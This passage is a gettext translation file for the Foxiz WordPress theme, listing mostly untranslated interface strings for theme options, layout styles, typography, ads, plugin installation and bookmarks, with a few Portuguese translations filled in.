#: backend/single-metaboxes.php:298 msgid "Standard Format" msgstr "" #: backend/single-metaboxes.php:304 msgid "Standard Layout" msgstr "" #: backend/panels/single-post.php:38 msgid "Standard Post Format Layout" msgstr "" #: backend/panels/header.php:207 msgid "Standard Search Form" msgstr "" #: backend/configs.php:48 includes/sidebars.php:70 msgid "Standard Sidebar" msgstr "" #: backend/single-metaboxes.php:508 msgid "Stars (1 > 5)" msgstr "" #: bookmark/templates.php:61 #, php-format msgid "" "Start saving your interested articles by clicking the %s icon and you'll " "find them all here." msgstr "" #: backend/class-tgm-plugin-activation.php:2648 msgid "Status" msgstr "" #: backend/panels/single-post.php:1580 backend/panels/single-post.php:1596 msgid "Sticky Headline" msgstr "" #: backend/panels/header.php:76 backend/panels/header.php:82 msgid "Sticky Menu" msgstr "" #: backend/category-settings.php:311 backend/panels/blog-pages.php:321 #: backend/panels/blog-pages.php:808 backend/panels/blog-pages.php:1222 #: backend/panels/blog-pages.php:1630 backend/panels/blog-pages.php:2122 #: backend/panels/bookmark.php:224 backend/panels/bookmark.php:672 #: backend/panels/page.php:82 backend/panels/sidebar.php:47 #: backend/panels/single-post.php:449 msgid "Sticky Sidebar" msgstr "" #: backend/panels/single-post.php:1582 msgid "" "Sticky the single heading and share on socials list when scrolling down." msgstr "" #: backend/panels/optimized.php:209 msgid "Street Address" msgstr "" #: backend/panels/page.php:33 backend/single-metaboxes.php:61 msgid "Style 1" msgstr "" #: backend/configs.php:72 msgid "Style 1 (Left Menu)" msgstr "" #: backend/configs.php:584 msgid "Style 1 (Right Featured Image)" msgstr "" #: backend/panels/design.php:579 backend/panels/page.php:34 #: backend/single-metaboxes.php:62 msgid "Style 2" msgstr "" #: backend/configs.php:585 msgid "Style 2 (Background Image)" msgstr "" #: backend/panels/design.php:596 msgid "Style 2 (Opacity)" msgstr "" #: backend/configs.php:73 msgid "Style 2 (Right Menu)" msgstr "" #: backend/panels/design.php:580 msgid "Style 3" msgstr "" #: backend/configs.php:74 msgid "Style 3 (Center Menu)" msgstr "" #: backend/configs.php:586 msgid "Style 3 (Minimalist)" msgstr "" #: backend/panels/design.php:581 msgid "Style 4" msgstr "" #: backend/configs.php:75 msgid "Style 4 (Border)" msgstr "" #: backend/panels/design.php:582 msgid "Style 5" msgstr "" #: backend/configs.php:76 msgid "Style 5 (Center Logo)" msgstr "" #: backend/panels/design.php:583 msgid "Style 6" msgstr "" #: backend/panels/design.php:584 msgid "Style 7" msgstr "" #: backend/panels/design.php:585 msgid "Style 8" msgstr "" #: backend/panels/ads.php:215 backend/panels/ads.php:404 msgid "Style Settings" msgstr "" #: backend/category-settings.php:112 backend/panels/blog-pages.php:98 msgid "Sub Categories List" msgstr "" #: backend/mega-menu.php:214 msgid "Sub Label" msgstr "" #: backend/panels/header-style.php:149 backend/panels/header-style.php:227 #: backend/panels/header-style.php:437 backend/panels/header-style.php:516 #: backend/panels/header-style.php:704 backend/panels/header-style.php:782 msgid "Sub Menu - Background Color" msgstr "" #: backend/panels/header-style.php:168 backend/panels/header-style.php:246 #: backend/panels/header-style.php:457 backend/panels/header-style.php:535 #: backend/panels/header-style.php:723 backend/panels/header-style.php:801 msgid "Sub Menu - Hover Text Color" msgstr "" #: backend/panels/header-style.php:160 backend/panels/header-style.php:238 #: backend/panels/header-style.php:449 backend/panels/header-style.php:527 #: backend/panels/header-style.php:715 backend/panels/header-style.php:793 msgid "Sub Menu - Text Color" msgstr "" #: backend/panels/typography.php:924 msgid "Sub-Level Menu Font" msgstr "" #: backend/panels/typography.php:969 msgid "Sub-Level Mobile Menu Font" msgstr "" #: backend/panels/newsletter.php:43 msgid "" "Subscribe to our newsletter and never miss our latest news, podcasts etc." msgstr "" #: backend/panels/design.php:258 msgid "Suffix" msgstr "" #: templates/single/reviews.php:214 msgid "Summary" msgstr "" #: backend/panels/table-contents.php:56 msgid "Support H1" msgstr "" #: backend/panels/table-contents.php:57 msgid "" "Support H1 tag, Turn this option off if you would like to exclude H1 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:63 msgid "Support H2" msgstr "" #: backend/panels/table-contents.php:64 msgid "" "Support H2 tag, Turn this option off if you would like to exclude H2 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:70 msgid "Support H3" msgstr "" #: backend/panels/table-contents.php:71 msgid "" "Support H3 tag, Turn this option off if you would like to exclude H3 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:77 msgid "Support H4" msgstr "" #: backend/panels/table-contents.php:78 msgid "" "Support H4 tag, Turn this option off if you would like to exclude H4 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:84 msgid "Support H5" msgstr "" #: backend/panels/table-contents.php:85 msgid "" "Support H5 tag, Turn this option off if you would like to exclude H5 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:91 msgid "Support H6" msgstr "" #: backend/panels/table-contents.php:92 msgid "" "Support H6 tag, Turn this option off if you would like to exclude H6 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:36 msgid "Support Single Page" msgstr "" #: backend/panels/table-contents.php:29 msgid "Support Single Post" msgstr "" #: backend/panels/design.php:622 msgid "Support upload file type SVG for your website." msgstr "" #: backend/panels/reaction.php:55 msgid "Surprise" msgstr "" #: backend/panels/design.php:621 msgid "SVG Supported" msgstr "" #: backend/panels/design.php:614 msgid "SVG Upload" msgstr "" #: templates/header/templates.php:667 msgid "Switch to Dark" msgstr "" #: templates/header/templates.php:666 msgid "Switch to Light" msgstr "" #: backend/single-metaboxes.php:705 msgid "Table of Content" msgstr "" #: backend/panels/table-contents.php:14 backend/single-metaboxes.php:710 msgid "Table of Contents" msgstr "" #: backend/panels/table-contents.php:132 msgid "Table of Contents Heading" msgstr "" #: backend/category-settings.php:479 backend/panels/block-classic.php:138 #: backend/panels/block-grid.php:138 backend/panels/block-grid.php:303 #: backend/panels/block-grid.php:468 backend/panels/block-grid.php:641 #: backend/panels/block-grid.php:828 backend/panels/block-list.php:146 #: backend/panels/block-list.php:319 backend/panels/block-list.php:500 #: backend/panels/block-list.php:695 backend/panels/blog-pages.php:504 #: backend/panels/blog-pages.php:991 backend/panels/blog-pages.php:1405 #: backend/panels/blog-pages.php:1813 backend/panels/blog-pages.php:2305 #: backend/panels/bookmark.php:403 backend/panels/bookmark.php:851 msgid "Tablet - Hide Entry Meta" msgstr "" #: backend/category-settings.php:449 backend/panels/blog-pages.php:475 #: backend/panels/blog-pages.php:962 backend/panels/blog-pages.php:1376 #: backend/panels/blog-pages.php:1784 backend/panels/blog-pages.php:2276 #: backend/panels/bookmark.php:374 backend/panels/bookmark.php:822 msgid "Tablet - Title Font Size" msgstr "" #: backend/panels/typography.php:59 backend/panels/typography.php:105 #: backend/panels/typography.php:154 backend/panels/typography.php:203 #: backend/panels/typography.php:252 backend/panels/typography.php:301 #: backend/panels/typography.php:350 backend/panels/typography.php:399 #: backend/panels/typography.php:448 backend/panels/typography.php:514 #: backend/panels/typography.php:562 backend/panels/typography.php:617 #: backend/panels/typography.php:660 backend/panels/typography.php:736 #: backend/panels/typography.php:793 backend/panels/typography.php:877 #: backend/panels/typography.php:1063 backend/panels/typography.php:1135 msgid "Tablet Font Size" msgstr "" #: backend/configs.php:405 backend/panels/design.php:271 msgid "tag (Tags)" msgstr "" #: templates/single/templates.php:639 msgid "TAGGED:" msgstr "Tags" #: backend/single-metaboxes.php:198 msgid "Tagline" msgstr "" #: backend/single-metaboxes.php:193 msgid "Tagline & Highlights" msgstr "" #: backend/panels/typography.php:1069 msgid "Tagline Font" msgstr "" #: backend/single-metaboxes.php:219 msgid "Tagline HTML Tag" msgstr "" #: backend/panels/typography.php:1070 msgid "" "Tagline tag will use default H6 tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/panels/blog-pages.php:1478 msgid "Tags & Archives" msgstr "" #: templates/entry.php:519 msgid "Tags:" msgstr "" #: backend/panels/single-post.php:795 backend/panels/single-post.php:934 #: backend/panels/single-post.php:1072 backend/panels/single-post.php:1697 #: templates/parts.php:645 msgid "Telegram" msgstr "" #: backend/panels/socials.php:140 msgid "Telegram URL " msgstr "" #: backend/category-settings.php:138 backend/panels/blog-pages.php:129 #: backend/panels/blog-pages.php:666 msgid "Template Display" msgstr "" #: backend/mega-menu.php:200 backend/panels/blog-pages.php:119 #: backend/panels/single-post.php:1402 msgid "Template Shortcode" msgstr "" #: backend/panels/header.php:551 msgid "Text Button" msgstr "" #: backend/category-settings.php:37 backend/panels/design.php:52 #: backend/panels/header-style.php:124 backend/panels/header-style.php:202 #: backend/panels/header-style.php:268 backend/panels/header-style.php:412 #: backend/panels/header-style.php:491 backend/panels/header-style.php:679 #: backend/panels/header-style.php:757 backend/panels/header.php:420 #: backend/panels/header.php:473 backend/panels/header.php:690 #: backend/panels/privacy.php:48 msgid "Text Color" msgstr "" #: backend/panels/footer.php:61 backend/panels/header.php:284 msgid "Text Color Scheme" msgstr "" #: backend/panels/footer.php:63 msgid "Text color scheme will be set to light in the dark mode." msgstr "" #: backend/mega-menu.php:146 msgid "Text Color Scheme: " msgstr "" #: backend/class-tgm-plugin-activation.php:2076 #, php-format msgid "TGMPA v%s" msgstr "" #: backend/panels/header.php:645 msgid "" "The alert bar will not be available if you use a header template. The theme " "provides other ways for you to add any info into the header template via " "HTML, text and button and other blocks." msgstr "" #: backend/panels/amp.php:15 msgid "" "The AMP plugin not found! Accelerated Mobile Pages support, Please install " "and activate Automattic AMP plugin to activate settings below." msgstr "" #: backend/panels/single-post.php:385 msgid "" "The author box requests author information (Users > Profile) for displaying." msgstr "" #: backend/panels/general.php:27 msgid "" "The back to top will be invisible on the mobile because it is not helpful." msgstr "" #: backend/panels/design.php:32 msgid "The category label display in the post listing." msgstr "" #: backend/panels/header.php:334 msgid "The center logo style is best suited for small width logos." msgstr "" #: includes/sidebars.php:71 msgid "The default sidebar of your website" msgstr "" #: backend/panels/heading.php:114 msgid "The default tag is H4." msgstr "" #: backend/panels/optimized.php:92 msgid "" "The dynamic file CSS may not apply immediately on some servers due to the " "server cache." msgstr "" #: backend/install-plugins.php:76 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with Foxiz: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:360 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with this theme: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:400 #: backend/class-tgm-plugin-activation.php:3046 msgid "The following plugin was activated successfully:" msgstr "" #: backend/class-tgm-plugin-activation.php:378 backend/install-plugins.php:74 #, php-format msgid "The following recommended plugin is currently inactive: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:372 backend/install-plugins.php:73 #, php-format msgid "The following required plugin is currently inactive: %1$s." msgstr "" #: backend/panels/typography.php:490 msgid "The font size will use the post entry meta font size setting." msgstr "" #: includes/sidebars.php:97 msgid "The full width section at the top of the footer." msgstr "" #: backend/panels/heading.php:17 msgid "The global heading settings for blocks, widgets, archives." msgstr "" #: backend/panels/header.php:42 msgid "The global settings will apply whole the website." msgstr "" #: backend/panels/header.php:189 msgid "" "The heading will show in the \"More\" section and \"Mobile Header Collapse\" " "section." msgstr "" #: backend/panels/blog-pages.php:2382 msgid "" "The image will be limited at 300px of height. Recommended image height is " "about 600px for the retina screen." msgstr "" #: backend/class-tgm-plugin-activation.php:3601 msgid "" "The installation and activation process is starting. This process may take a " "while on some hosts, so please be patient." msgstr "" #: backend/class-tgm-plugin-activation.php:3597 #, php-format msgid "The installation of %1$s failed." msgstr "" #: backend/class-tgm-plugin-activation.php:3609 msgid "" "The installation process is starting. This process may take a while on some " "hosts, so please be patient." msgstr "" #: backend/panels/single-post.php:46 msgid "" "The layout automatically rollback to the \"Classic\" if featured image isn't " "set." msgstr "" #: backend/panels/ads.php:478 backend/panels/newsletter.php:78 msgid "The period to redisplay the popup when visitors closed it." msgstr "" #: backend/panels/design.php:687 msgid "The recommended value is 1 to 20. Leave blank to set it as the default." msgstr "" #: backend/panels/single-post.php:1277 msgid "" "The related box will not appear on post have number of paragraph less than " "this setting." msgstr "" #: backend/class-tgm-plugin-activation.php:1030 msgid "" "The remote plugin package consists of more than one file, but the files are " "not packaged in a folder." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 msgid "" "The remote plugin package does not contain a folder with the desired slug " "and renaming did not work." msgstr "" #: backend/panels/single-post.php:1169 msgid "The Score (1 > 10)" msgstr "" #: includes/sidebars.php:165 msgid "" "The section at the bottom of the single post content. It usually uses to " "display adverts or the post related shortcode." msgstr "" #: includes/sidebars.php:156 msgid "" "The section at the top of the single post content. It usually uses to " "display adverts" msgstr "" #: backend/panels/design.php:575 msgid "The setting below applies to the post title and hyperlinks." msgstr "" #: backend/panels/design.php:593 msgid "The setting below applies to top level menu items." msgstr "" #: backend/panels/single-post.php:1542 msgid "The setting below will apply to the single post pages." msgstr "" #: backend/panels/blog-pages.php:366 backend/panels/blog-pages.php:853 #: backend/panels/blog-pages.php:1267 backend/panels/blog-pages.php:1675 #: backend/panels/blog-pages.php:2167 msgid "" "The setting will not apply if the selected blog layout does not support the " "selected entry category." msgstr "" #: backend/panels/single-post.php:1268 msgid "" "The setting will not apply to posts have been added shortcode directly into " "content." msgstr "" #: backend/panels/blog-pages.php:590 msgid "The settings below apply the blog page." msgstr "" #: backend/panels/typography.php:637 msgid "The settings below apply to all button on your website." msgstr "" #: backend/panels/typography.php:36 msgid "" "The settings below apply to almost post and page content on your website." msgstr "" #: backend/panels/header-style.php:263 msgid "The settings below apply to the \"Transparent Header 1,2 and 3\"." msgstr "" #: backend/panels/blog-pages.php:2377 msgid "The settings below apply to the 404 page." msgstr "" #: backend/panels/blog-pages.php:1066 msgid "The settings below apply to the author pages." msgstr "" #: backend/panels/typography.php:854 msgid "The settings below apply to the breadcrumb bar." msgstr "" #: backend/panels/header-style.php:18 msgid "The settings below apply to the header style 1, 2 and 3." msgstr "" #: backend/panels/header-style.php:312 msgid "The settings below apply to the header style 4." msgstr "" #: backend/panels/header-style.php:563 msgid "The settings below apply to the header style 5." msgstr "" #: backend/panels/typography.php:594 msgid "" "The settings below apply to the input and textarea form on your website." msgstr "" #: backend/panels/header.php:309 msgid "The settings below apply to the mobile header." msgstr "" #: backend/panels/blog-pages.php:1888 msgid "The settings below apply to the search page." msgstr "" #: backend/panels/page.php:18 msgid "The settings below apply to the single page." msgstr "" #: backend/single-metaboxes.php:300 msgid "" "The settings below apply to the standard post format. Using the " "corresponding panel if you select another post format for this post." msgstr "" #: backend/panels/blog-pages.php:1481 msgid "The settings below apply to the tags and other archive pages." msgstr "" #: backend/panels/logo.php:31 msgid "The settings below apply to whole your website." msgstr "" #: backend/panels/ads.php:174 backend/panels/ads.php:363 msgid "" "The settings below will apply if you choose the \"Custom Image\" ad type." msgstr "" #: backend/panels/ads.php:117 backend/panels/ads.php:306 msgid "The settings below will apply if you choose the \"Script\" ad type." msgstr "" #: backend/panels/blog-pages.php:197 backend/panels/blog-pages.php:245 #: backend/panels/blog-pages.php:299 backend/panels/blog-pages.php:342 #: backend/panels/blog-pages.php:542 backend/panels/blog-pages.php:732 #: backend/panels/blog-pages.php:786 backend/panels/blog-pages.php:829 #: backend/panels/blog-pages.php:1030 backend/panels/blog-pages.php:1146 #: backend/panels/blog-pages.php:1200 backend/panels/blog-pages.php:1243 #: backend/panels/blog-pages.php:1443 backend/panels/blog-pages.php:1554 #: backend/panels/blog-pages.php:1608 backend/panels/blog-pages.php:1651 #: backend/panels/blog-pages.php:1851 backend/panels/blog-pages.php:2046 #: backend/panels/blog-pages.php:2100 backend/panels/blog-pages.php:2143 msgid "" "The settings below will be not available if you use \"Global WP Query " "Template Shortcode\" to build the blog listing." msgstr "" #: backend/category-settings.php:19 msgid "" "The settings below will override on the default settings in \"Theme Options >" " Category\"." msgstr "" #: templates/popup.php:108 msgid "" "The short code is incorrect or empty form. Please check the setting again!" msgstr "" #: backend/panels/typography.php:699 msgid "" "The single headline will use H1 font settings as the default. You can " "override the settings in this panel." msgstr "" #: backend/panels/typography.php:756 msgid "" "The single tagline will use the H2 tag font settings. You can override " "settings in this panel." msgstr "" #: backend/panels/design.php:667 msgid "" "The small border style in featured images and other element whole the " "website." msgstr "" #: backend/panels/single-post.php:1168 msgid "The Star (1 > 5)" msgstr "" #: includes/sidebars.php:87 msgid "The submenu section when hovering on the more button." msgstr "" #: backend/panels/blog-pages.php:198 msgid "" "The theme supports heading dynamic content, Please read the documentation " "for further information." msgstr "" #: backend/panels/breadcrumb.php:16 msgid "" "The theme supports Navxt plugin Yoast SEO and Rank Math SEO breadcrumbs." msgstr "" #: backend/panels/optimized.php:82 msgid "" "The theme will load default fonts to render some elements as heading tags, " "body, meta." msgstr "" #: backend/panels/blog-pages.php:343 backend/panels/blog-pages.php:830 #: backend/panels/blog-pages.php:1244 backend/panels/blog-pages.php:1652 #: backend/panels/blog-pages.php:2144 backend/panels/bookmark.php:244 #: backend/panels/bookmark.php:692 msgid "" "The theme will use \"Standard Blog Design\" settings to render block. You " "can override settings in the panel below." msgstr "" #: backend/single-metaboxes.php:886 msgid "" "The transparent headers is only suitable for layouts: Standard 2, Standard 5," " Video 2 and Audio 2." msgstr "" #: backend/panels/single-post.php:1558 msgid "" "The transparent headers is only suitable with layouts: Standard 2, Video 2 " "and Audio 2." msgstr "" #: backend/single-metaboxes.php:109 msgid "" "The transparent headers is only suitable with the page has a sliders or wide " "image at the top." msgstr "" #: backend/panels/design.php:16 msgid "Theme Design" msgstr "" #: backend/theme-options.php:240 backend/theme-options.php:241 msgid "Theme Options" msgstr "" #: backend/class-tgm-plugin-activation.php:408 msgid "" "There are one or more required or recommended plugins to install, update or " "activate." msgstr "" #: backend/class-tgm-plugin-activation.php:366 #, php-format msgid "There is an update available for: %1$s." msgstr "" #: backend/panels/blog-pages.php:19 msgid "" "These are global category settings. The settings below will apply to all " "category pages." msgstr "" #: backend/panels/block-grid.php:515 msgid "" "These are settings for the boxed grid 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:702 msgid "" "These are settings for the boxed grid 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:366 msgid "" "These are settings for the boxed list 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:561 msgid "" "These are settings for the boxed list 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-classic.php:20 msgid "" "These are settings for the Classic (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-grid.php:20 msgid "" "These are settings for the Grid 1 (standard). It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:185 msgid "" "These are settings for the grid 2 layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:20 msgid "" "These are settings for the list 1 (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-list.php:193 msgid "" "These are settings for the list 2. It will be overridden by the \"Block " "Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive " "pages)." msgstr "" #: backend/panels/block-grid.php:350 msgid "" "These are settings for the small grid layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)" msgstr "" #: backend/panels/design.php:90 msgid "" "These are small elements that display in the post listing ie: author name, " "date, total views, total comments..." msgstr "" #: backend/panels/breadcrumb.php:24 msgid "" "These settings below require to activate Navxt plugin Yoast SEO and Rank " "Math SEO breadcrumbs in order to work." msgstr "" #: bookmark/bookmark.php:174 msgid "This article has been added to reading list" msgstr "" #: bookmark/bookmark.php:190 msgid "This article was removed from reading list" msgstr "" #: bookmark/bookmark.php:209 msgid "This article was removed from your bookmark" msgstr "" #: templates/parts.php:116 #, php-format msgid "" "This block requests at least %s posts, Please add new posts for this query " "or change the block settings: " msgstr "" #: backend/panels/optimized.php:254 msgid "" "This image is used if the post/page being shared does not contain featured " "images." msgstr "" #: backend/panels/single-post.php:1233 msgid "This is a global option to disable all comments on posts & page..." msgstr "" #: backend/panels/sidebar.php:28 msgid "" "This is the global option and will be overridden by individual \"Sidebar " "Position\" settings." msgstr "" #: backend/single-metaboxes.php:284 msgid "" "This option is useful in case you would like to create a custom entry meta." msgstr "" #: backend/panels/newsletter.php:105 msgid "" "This option use for \"Scroll Distance\" mode. Input a distance value (px) " "when visitor scrolling down to show the popup." msgstr "" #: backend/panels/newsletter.php:112 msgid "" "This option use for \"Time Delay\" mode. Input a delay time (ms) value to " "show the popup after the site loaded." msgstr "" #: backend/panels/design.php:329 msgid "" "This option will help you optimize the site speed or increase image quality " "on your website." msgstr "" #: backend/class-tgm-plugin-activation.php:615 msgid "This plugin needs to be updated to be compatible with your theme." msgstr "" #: backend/panels/ads.php:86 msgid "" "This section supports ads in the top header website. For other ad spots, " "please read the theme documentation for further info." msgstr "" #: backend/panels/ads.php:274 msgid "" "This section supports ads inside single post content, after x paragraphs. " "For other ad spots, please read the theme documentation for further info." msgstr "" #: backend/panels/header.php:639 msgid "" "This section will show a small alert or event at the bottom of the " "navigation." msgstr "" #: backend/panels/header.php:264 msgid "This section will show the user bookmark list and latest blog listing." msgstr "" #: backend/panels/header.php:620 msgid "This setting apply to the logout button in the logged user dropdown." msgstr "" #: backend/panels/header.php:61 msgid "" "This setting requires to set \"Use Ruby Template\" in the setting above in " "order to work." msgstr "" #: backend/panels/color.php:125 backend/panels/color.php:142 msgid "This setting will apply to the default mode." msgstr "" #: backend/panels/blog-pages.php:155 msgid "" "This setting will be overridden by \"Global WP Query Template Shortcode\" in " "the individual category setting panel." msgstr "" #: backend/panels/blog-pages.php:121 msgid "" "This setting will be overridden by \"template shortcode\" in the individual " "category setting panel." msgstr "" #: backend/panels/table-contents.php:150 msgid "This setting will not apply to the full width 2 columns layout." msgstr "" #: backend/panels/single-post.php:499 msgid "" "This setting will only apply on the desktop devices. Navigate to " "\"Typography > Entry Category\" to set for tablet mobile devices." msgstr "" #: backend/panels/blog-pages.php:179 backend/panels/blog-pages.php:715 #: backend/panels/blog-pages.php:1130 msgid "" "This setting will override on \"Dashboard > Settings > Reading > Blog pages " "show at most\" setting. It also apply to the \"Global WP Query Template " "Shortcode\"." msgstr "" #: backend/mega-menu.php:198 msgid "This setting will override on above settings." msgstr "" #: backend/panels/blog-pages.php:62 backend/panels/blog-pages.php:628 #: backend/panels/blog-pages.php:1946 msgid "" "This setting will override on the \"Header Style\" setting, Leave it blank " "if you would like to use the \"Header Style\" setting." msgstr "" #: backend/panels/blog-pages.php:47 backend/panels/blog-pages.php:613 #: backend/panels/blog-pages.php:1931 msgid "" "This setting will override on the setting in the header panel. It will not " "apply to the header style 4." msgstr "" #: backend/class-tgm-plugin-activation.php:354 #, php-format msgid "This theme recommends the following plugin: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:348 #, php-format msgid "This theme requires the following plugin: %1$s." msgstr "" #: backend/panels/newsletter.php:97 msgid "Time Delay" msgstr "" #: backend/panels/adblock.php:26 backend/panels/newsletter.php:34 msgid "Title" msgstr "" #: backend/category-settings.php:433 backend/panels/block-classic.php:120 #: backend/panels/block-grid.php:120 backend/panels/block-grid.php:285 #: backend/panels/block-grid.php:450 backend/panels/block-grid.php:623 #: backend/panels/block-grid.php:810 backend/panels/block-list.php:128 #: backend/panels/block-list.php:301 backend/panels/block-list.php:482 #: backend/panels/block-list.php:677 backend/panels/blog-pages.php:460 #: backend/panels/blog-pages.php:947 backend/panels/blog-pages.php:1361 #: backend/panels/blog-pages.php:1769 backend/panels/blog-pages.php:2261 #: backend/panels/bookmark.php:359 backend/panels/bookmark.php:807 msgid "Title HTML Tag" msgstr "" #: backend/class-tgm-plugin-activation.php:2494 #, php-format msgid "To Activate (%s)" msgstr "" #: backend/panels/header.php:121 msgid "" "To add column widgets, navigate to \"Dashboard > Appearance > Widgets > More " "Menu Section\". Please read the documentation for further information." msgstr "" #: backend/panels/footer.php:92 msgid "To add content, please navigate to Appearance > Widgets." msgstr "" #: backend/panels/logo.php:39 msgid "" "To add the favicon, navigate to \"Appearance > Customize > Site Identity > " "Site Icon\". Please read the documentation for further information." msgstr "" #: backend/panels/design.php:40 msgid "" "To edit color for individual category, navigate to \"Admin Dashboard > Posts " "> Categories > Edit\"." msgstr "" #: backend/panels/blog-pages.php:25 msgid "" "To edit for individual category, navigate to \"Admin Dashboard > Posts > " "Categories > Edit\"." msgstr "" #: backend/panels/single-post.php:1550 msgid "" "To edit for individual post, navigate to \"Posts > Edit > Post Options > " "Site Header\"." msgstr "" #: backend/panels/heading.php:29 msgid "" "To edit the heading typography, navigate to \"Typography > Block Heading\"." msgstr "" #: backend/panels/header.php:182 msgid "" "To edit the placeholder text of the search form, navigate to \"Theme Options " "> General > Search Placeholder\"." msgstr "" #: backend/panels/single-post.php:524 msgid "" "To edit the tagline typography, navigate to \"Typography > Headline & " "Tagline > Single Tagline\"." msgstr "" #: backend/panels/header.php:315 msgid "" "To edit the typography, navigate to \"Typography > Menu > Mobile Menu " "Settings\". Navigate to \"Social Profiles\" for the social list." msgstr "" #: backend/panels/sidebar.php:21 msgid "" "To edit the widget heading layout, navigate to \"Heading Design > Sidebar " "Widget Heading\"." msgstr "" #: backend/class-tgm-plugin-activation.php:2486 #, php-format msgid "To Install (%s)" msgstr "" #: backend/panels/amp.php:132 msgid "" "To setup the copyright area, Please navigate to Footer > Copyright Section." msgstr "" #: backend/panels/single-post.php:1260 msgid "" "To use the shortcode, read the documentation \"Related Box Shortcode\" for " "further information." msgstr "" #: backend/panels/header.php:203 msgid "Toggle Mode" msgstr "" #: backend/panels/general.php:17 msgid "Tooltips" msgstr "" #: backend/configs.php:376 msgid "Top" msgstr "" #: backend/panels/blog-pages.php:643 msgid "Top & Bottom Area Template Builder" msgstr "" #: backend/panels/header-style.php:618 msgid "Top & Bottom Border" msgstr "" #: backend/configs.php:377 msgid "Top (Big Icon)" msgstr "" #: backend/panels/amp.php:420 msgid "Top - Ad Type" msgstr "" #: backend/panels/amp.php:448 msgid "Top - Adsense Size" msgstr "" #: backend/panels/amp.php:460 msgid "Top - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:432 msgid "Top - Data Ad Client" msgstr "" #: backend/panels/amp.php:440 msgid "Top - Data Ad Slot" msgstr "" #: backend/category-settings.php:129 backend/panels/blog-pages.php:649 msgid "Top Area Template Shortcode" msgstr "" #: backend/panels/footer.php:53 msgid "Top Border" msgstr "" #: backend/single-metaboxes.php:681 msgid "Top Entry Widgets Area" msgstr "" #: includes/menu.php:302 msgid "Top News" msgstr "" #: backend/panels/single-post.php:706 msgid "Top Share Bar" msgstr "" #: backend/panels/amp.php:414 msgid "Top Single Content Ad Settings" msgstr "" #: backend/panels/ads.php:77 backend/panels/privacy.php:25 msgid "Top Site" msgstr "" #: backend/single-metaboxes.php:142 backend/single-metaboxes.php:919 msgid "Top Site Advert" msgstr "" #: backend/category-settings.php:124 backend/panels/blog-pages.php:114 msgid "Top Template Builder" msgstr "" #: backend/panels/woocommerce.php:147 msgid "Total Related Products" msgstr "" #: backend/configs.php:80 msgid "Transparent - Style 1" msgstr "" #: backend/configs.php:81 msgid "Transparent - Style 2" msgstr "" #: backend/configs.php:82 msgid "Transparent - Style 3" msgstr "" #: backend/panels/header-style.php:262 msgid "Transparent Colors" msgstr "" #: backend/panels/logo.php:125 msgid "Transparent Logo" msgstr "" #: backend/panels/logo.php:115 msgid "Transparent Logos" msgstr "" #: backend/panels/logo.php:133 msgid "Transparent Retina Logo" msgstr "" #: backend/panels/header.php:547 msgid "Trigger Button Layout" msgstr "" #: backend/panels/single-post.php:768 backend/panels/single-post.php:907 #: backend/panels/single-post.php:1045 backend/panels/single-post.php:1673 #: templates/parts.php:609 msgid "Tumblr" msgstr "" #: backend/panels/socials.php:68 msgid "Tumblr URL " msgstr "" #: backend/panels/single-post.php:732 backend/panels/single-post.php:871 #: backend/panels/single-post.php:1009 backend/panels/single-post.php:1641 #: templates/parts.php:594 msgid "Twitter" msgstr "" #: backend/panels/socials.php:35 msgid "Twitter URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2643 msgid "Type" msgstr "" #: backend/panels/typography.php:13 msgid "Typography" msgstr "" #: backend/panels/single-post.php:245 msgid "Underline Color" msgstr "" #: bookmark/bookmark.php:57 msgid "Undo" msgstr "" #: templates/parts.php:803 msgid "Unfollow" msgstr "" #: backend/class-tgm-plugin-activation.php:2576 msgid "unknown" msgstr "" #: backend/panels/sidebar.php:37 msgid "Unlimited Sidebars" msgstr "" #: backend/class-tgm-plugin-activation.php:2817 msgid "Update" msgstr "" #: backend/configs.php:408 backend/panels/design.php:274 msgid "update (Last Updated)" msgstr "atualização (última atualização)" #: backend/class-tgm-plugin-activation.php:2702 #, php-format msgid "Update %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2490 #, php-format msgid "Update Available (%s)" msgstr "" #: backend/class-tgm-plugin-activation.php:2427 msgid "Update recommended" msgstr "" #: backend/class-tgm-plugin-activation.php:616 msgid "Update Required" msgstr "" #: templates/single/templates.php:456 msgid "Updated" msgstr "Atualizado" #: backend/panels/design.php:117 msgid "Updated Date Icon" 